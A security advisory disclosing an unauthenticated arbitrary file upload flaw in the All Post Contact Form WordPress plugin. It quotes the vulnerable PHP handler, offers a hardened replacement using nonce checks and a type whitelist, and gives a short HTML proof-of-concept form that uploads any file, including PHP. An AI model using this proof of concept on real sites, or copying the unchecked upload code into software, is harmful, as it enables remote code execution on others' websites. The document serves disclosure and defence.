20 Sep

Arbitrary File Upload Vulnerability in All Post Contact Form

Through the proactive monitoring of changes in WordPress plugins for serious vulnerabilities that we do, we recently found an arbitrary file upload vulnerability in the All Post Contact Form plugin.

When the plugin's shortcode, rlallpostcontactform, is on a post or page, the file /allpost-contactform-core.php is included. In that file the following code is run:

// No nonce, capability, or file type check precedes the move; the
// client-supplied filename (including its extension) is used as-is.
if(is_uploaded_file($_FILES['attachment_file']['tmp_name'])){
    move_uploaded_file($_FILES['attachment_file']['tmp_name'],WP_CONTENT_DIR.'/uploads/'.$_FILES['attachment_file']['name'] );
}

That code checks whether the request includes a file under the form field name “attachment_file” and, if it does, saves it to the directory /wp-content/uploads/ under the filename supplied by the client. There is no nonce, capability, or file type check, so anyone who can load a page containing the shortcode can upload a .php file into a web-accessible directory and then request it, which gives them remote code execution on the site.
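For comparison, the following is a hardened replacement for that attachment handling. It is an added example written for this post, not code from the All Post Contact Form plugin; the function names, the nonce action and field name (rl_contact_form_submit, rl_contact_form_nonce) and the whitelist of allowed types are assumptions. It relies only on WordPress core functions (wp_nonce_field, wp_verify_nonce, wp_handle_upload) and keeps the original field name attachment_file.

```php
<?php
// Added example, not the plugin's own code. Assumed names: the nonce action
// 'rl_contact_form_submit', the nonce field 'rl_contact_form_nonce', and the
// whitelist below. The upload field name 'attachment_file' is the plugin's.

// Output this inside the contact form so the handler can tell that the
// submission came from the form on this site rather than from a third-party
// page such as the proof of concept form.
function rl_contact_form_nonce_field() {
    wp_nonce_field( 'rl_contact_form_submit', 'rl_contact_form_nonce' );
}

// Process a submitted attachment. Returns the absolute path of the stored
// file, null when no attachment was sent, or a WP_Error when the upload is
// refused.
function rl_contact_form_handle_attachment() {
    // 1. Reject submissions that do not carry a valid nonce for our action.
    if ( ! isset( $_POST['rl_contact_form_nonce'] )
        || ! wp_verify_nonce( $_POST['rl_contact_form_nonce'], 'rl_contact_form_submit' ) ) {
        return new WP_Error( 'bad_nonce', 'Invalid form submission.' );
    }

    // 2. The attachment is optional; do nothing if none was uploaded.
    if ( empty( $_FILES['attachment_file']['tmp_name'] )
        || ! is_uploaded_file( $_FILES['attachment_file']['tmp_name'] ) ) {
        return null;
    }

    // 3. Whitelist only what a contact form legitimately needs. Everything
    //    else (.php, .phtml, .htaccess, ...) is refused by wp_handle_upload,
    //    which also compares the file content against the extension.
    $allowed = array(
        'pdf'      => 'application/pdf',
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
    );

    require_once ABSPATH . 'wp-admin/includes/file.php';

    $result = wp_handle_upload(
        $_FILES['attachment_file'],
        array(
            'test_form' => false,   // this is not the core media upload form
            'mimes'     => $allowed,
        )
    );

    if ( isset( $result['error'] ) ) {
        return new WP_Error( 'upload_rejected', $result['error'] );
    }

    // wp_handle_upload has sanitized the filename, made it unique, and placed
    // the file under the configured uploads directory for the current month.
    return $result['file'];
}
```

Two points worth keeping in mind when applying this. The nonce stops the cross-site form shown in the proof of concept, but a nonce is issued to logged-out visitors as well, so an attacker who first loads the form can obtain one; the control that actually prevents code execution is the file type whitelist enforced by wp_handle_upload, so do not drop it in favour of the nonce alone. Also, because the original code wrote directly into /wp-content/uploads/ with the client's filename, any site that ran the vulnerable version should have that directory checked for unexpected .php files before treating the fix as complete.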

We contacted the developer about the vulnerability a week ago, but have not heard back from them. In line with our disclosure policy, which is based on the need to provide our customers with information on vulnerabilities on a timely basis, we are now disclosing this vulnerability.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/.

Make sure to replace “[path to shortcode post]” with the location of the post (or page) with the shortcode “rlallpostcontactform”.

<html>
<body>
<form action="[path to shortcode post]" method="POST" enctype="multipart/form-data">
<input type="file" name="attachment_file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • September 13, 2017 – Developer notified.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if they knew about them, as well as making sure that the needed security checks have been implemented in the plugin. If you order two reviews you will receive a free lifetime subscription to our service.
